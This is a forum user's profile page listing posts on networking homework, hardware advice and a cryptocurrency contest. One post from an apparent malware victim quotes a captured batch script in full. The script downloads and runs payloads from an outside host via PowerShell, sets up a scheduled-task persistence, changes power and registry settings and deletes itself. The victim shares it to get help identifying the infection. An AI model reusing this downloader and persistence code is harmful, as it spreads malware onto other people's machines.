Jump to content
Search In
  • More options...
Find results that contain...
Find results in...


  • Content Count

  • Joined

  • Last visited


This user doesn't have any awards

About ciprian97pop

  • Title
  • Birthday 1997-07-29

Contact Methods

  • Origin
  • Twitter

Profile Information

  • Gender
  • Location
  • Interests
    Gaming, OC-ing, Everything tech-related
  • Occupation

Recent Profile Visitors

2,702 profile views
  1. I... I really don't know. It's more embarrassing as i work as a system administrator and I should be the one stopping things like this from happening. If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that
  2. Yep. Malware-bytes got rid of it I will keep doing some daily scans until next week just to be sure
  3. Hi again So... yeah.. Today I installed malware-bytes and let's just say that that wasn't a windows event reporter Again, thank you guys for your involvement
  4. Thank you guys for your replies I will stop killing the process and let it run hoping it will disappear soon. Just hoping that i won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted P.S.: Making a backup on google drive with my most important files just to be safe
  5. Are you sure? why would it need to consume that much cpu if it's just some event monitor I also read that article but didn't thought much of it
  6. Hello everyone Today I noticed a weird process showing up in task manager, that's constantly consuming 45-50% of my cpu all the time The process is called sysmon.exe and i'm aware of it since a few hours ago. Everytime i kill the process it comes back. It also creates the .exe in the appdata/temp folder I've searched online but i didn't find almost anything about it. Also, I'm in the process of downloading an antivirus (used windows defender because i don't download or use suspicious stuff) I also thought that it might be some sort of coin miner but it wasn't using any internet Here's a screenshot of it: Also, here's the path to the file UPDATE: After some more digging, i found out that everytime, it creates a temp_XXXX folder (wher xxxx are random numbers) and in that folder it also creates 3 .bat files The start.bat file is just running the build.bat file but here's what i found when i opened the build.bat file At this point i'm 99% sure that this is some kind of coin miner/malware Here comes the fun part This is what i found when I opened the upd.bat file <spoiler> ping www.google.com -n 1 -w 1000 if %errorlevel% == 1 ( exit ) if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\"" ) if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" ) if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" ) if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" ) if not exist "%TEMP%\opokl.txt" ( PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\"" PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\"" schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F del "%TEMP%\svctask.xml" echo a > "%TEMP%\opokl.txt" ) if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\"" PowerShell -Command "Invok e-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\"" "%TEMP%\batchinstaller.bat" ) set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 (for %%a in (%list%) do ( powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90 )) powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" ( "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y "%~dp0\packagenew\buildpassive.bat" echo d > "%LOCALAPPDATA%\svc10.17134\d.txt" rmdir /s /q "%~dp0\packagenew" ) taskkill /f /im sysmon.exe ::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL ::if "%ERRORLEVEL%"=="0" exit "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y "%~dp0\packagehwloc\start.bat" start /b "" cmd /c del "%~dp0\upd.bat"&exit /b </spoiler> Yeah, so it surely is a virus or some sort of malware Could someone explain me what that code does? It would help alot Also, any suggestions would be greatly appreciated. Thank you
  7. link to the contest: https://www.reddit.com/r/dogecoin/comments/7kvpy7/video_contest_18_million_doge_to_celebrate_2018/ so basically the guys over on the dogecoin reddit page are organising a contest celebrating that the year 2018 will be the year of the dog To enter the contest you have to create a short and fun video regarding dogecoin and that's it the craziest part is that right now, 18.000.000 dogecoins are worth about $144.000 also, today dogecoin has reached an all time high of $0.008768 P.S.: I am making this topic just to get more people to participate. i am not affiliated in any shape or form with the guys over there and I gain nothing from making this topic, i just wanna make more people aware of this contest and if this violates the rules i'm sorry and i will support all the consequences
  8. thank you for all the links and all the help from the previous post. It would be logical to create different subnets for different parts of the network and for different building stories but thankfully the assignment doesn't have to be that complex. Yeah, it could be, but the extra points that I would be getting for doing that isn't worth the effort because te assignment has also an economical part which includes things like the cost of the whole operation, amortization of equipement and many others. this was just a part of it thank you again for everyone's help
  9. my bad, by the last address i was thinking at x.x.x.254 and by first at x.x.x.1 in the router config i have a few tabs the first tab is lan in which i have the routers ip address( the second tah is internet in which i have these boxes(see the screenshot below) it's named wi fi free because i've got the same router set as the free wi-fi part of the network if i set the default gateway like this, to the last address and the ip address as being the first one, on the pcs which shoud i put as the default gateway, the one with 254 at the end? edit: in the screenshot the dg is .2.254 but i've changed it to .3.254
  10. got it i've set the default gateway to the subnet mask auto-filled to but i was able to change it this time without a problem to and i started giving ip addresses to pcs from (because I gave to the main router) and now it works. thank you for your help P.S.: should the default gateway be the last ip address of the inerval like I've set it to be? it's a question that i keet asking myself
  11. this ^ get the 1400 and spend the extra money on a 470/570/480/580 and then maybe try to save up for a cpu cooler for oc edit: if you already have the 1050ti bought, still get the 1400 and invers the money in something else like a cpu cooler
  12. the cpu has nothing to do with the chipset of the board as long as its a am4 board
  13. whichever one is the cheapest. you don't have a big budget and the speed differences between those drives is at max 20-30 mb/s, a difference which you won't notice
  14. hey everyone i have an assignment to make for my networking class but i'm stuck on something i have to make a computer network for a business with 950 hosts i've thought to make it an IT company that has the following structure: 600 hosts for the IT and programming department(500 hosts for desktops and a private wifi network for 100 laptops), 200 hosts for the marketing and hr department and another 150 hosts for public free wi-fi the first step is to calculate the subnet mask, right? that's what i did my subnet mask is (because 2^9 is 512 which is not enough and 2^10 is 1024) now here comes my question. I know that i can use 1024 ips which is more than enough for me but what interval of ip s can i use? at first I thought that i can use any kind of private ips(like 10.x.x.x or 177.(21-32).x.x or 192.168.x.x) but if I put in Cisco Packet Tracer(the program in which i have to exemplify the network) as an ip for a pc, it changes my subnet mask to's what I remember changing it to). if i set the subnet mask first to and then enter an ip it gives me an error and I cannot continue Can you please tell me what am I doing wrong? and what is the ip interval that i can use thank you
  15. somehow maybe the rom was the problem i tried copying another rom with the same method mentioned above, renamed it and i was able to install it without any problems thank you very much for your help